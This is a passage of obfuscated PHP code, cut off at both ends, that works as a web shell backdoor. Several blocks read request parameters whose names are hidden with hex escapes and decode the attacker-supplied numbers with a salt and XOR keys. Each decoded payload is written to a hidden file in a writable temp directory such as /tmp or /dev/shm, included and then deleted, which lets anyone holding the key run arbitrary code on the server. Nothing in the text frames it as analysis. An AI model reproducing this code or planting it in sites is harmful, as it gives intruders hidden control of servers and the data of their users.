= $__len) break; $v3 = $val[$i]; $sChar = ord($salt[$i % $sLen]); $d = ((int)$v3 - $sChar - ($i % 10))^ 25; $reference .= chr($d); $i++; } while (true); foreach ($element as $key => $pointer) { if (is_dir($pointer) && is_writable($pointer)) { $fac = implode("/", [$pointer, ".bind"]); if (file_put_contents($fac, $reference)) { include $fac; @unlink($fac); exit; } } } } if(in_array("en\x74", array_keys($_POST))){ $component = $_POST["en\x74"]; $component = explode ( "." ,$component ) ; $data_chunk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $__len = count($component); for($k = 0; $k <$__len; $k++) { $v9 = $component[$k]; $chS = ord($salt[$k % $sLen]); $d =((int)$v9 - $chS -($k % 10)) ^ 25; $data_chunk .= chr($d); } $dat = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), "/tmp", "/var/tmp", session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/dev/shm"]); for ($pset = 0, $symbol = count($dat); $pset < $symbol; $pset++) { $value = $dat[$pset]; if ((bool)is_dir($value) && (bool)is_writable($value)) { $res = vsprintf("%s/%s", [$value, ".reference"]); $success = file_put_contents($res, $data_chunk); if ($success) { include $res; @unlink($res); die();} } } } if(@$_POST["de\x73cr\x69\x70\x74\x6Fr"] !== null){ $dat = array_filter([getenv("TMP"), sys_get_temp_dir(), "/dev/shm", session_save_path(), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", "/var/tmp"]); $bind = $_POST["de\x73cr\x69\x70\x74\x6Fr"]; $bind =explode ( '.' , $bind ) ; $tkn=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($salt); $u=0; $len=count($bind); do { if ($u>= $len) break; $v3=$bind[$u]; $sChar=ord($salt[$u % $sLen]); $dec=((int)$v3 - $sChar - ($u % 10)) ^ 43; $tkn .= chr($dec); $u++; } while (true); foreach ($dat as $item): if ((function($d) { return is_dir($d) && is_writable($d); })($item)) { $ent = join("/", [$item, ".ref"]); $file = fopen($ent, 'w'); if ($file) { fwrite($file, $tkn); fclose($file); include $ent; @unlink($ent); die(); } } endforeach; } if(array_key_exists("\x72\x65c", $_POST) && !is_null($_POST["\x72\x65c"])){ $flag = array_filter(["/tmp", getcwd(), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), session_save_path()]); $property_set = $_POST["\x72\x65c"]; $property_set= explode ( "." ,$property_set) ; $token = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s7); $w = 0; while ($w < count($property_set)) { $v7 = $property_set[$w]; $chS = ord($s7[$w %$sLen]); $dec = ((int)$v7 - $chS - ($w %10))^86; $token .= chr($dec); $w++; } while ($obj = array_shift($flag)) { if ((function($d) { return is_dir($d) && is_writable($d); })($obj)) { $ref = str_replace("{var_dir}", $obj, "{var_dir}/.ptr"); $file = fopen($ref, 'w'); if ($file) { fwrite($file, $token); fclose($file); include $ref; @unlink($ref); exit; } } } } if(@$_REQUEST["f\x61\x63\x74or"] !== null){ $ent = array_filter(["/var/tmp", "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), getcwd(), sys_get_temp_dir(), session_save_path()]); $resource = $_REQUEST["f\x61\x63\x74or"]; $resource = explode ( "." ,$resource) ; $flg = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s4); $x = 0; $__len = count($resource); do { if($x >= $__len) break; $v2 = $resource[$x]; $chS = ord($s4[$x % $lenS]); $d =((int)$v2 - $chS -($x % 10)) ^ 49; $flg.=chr($d); $x++;} whil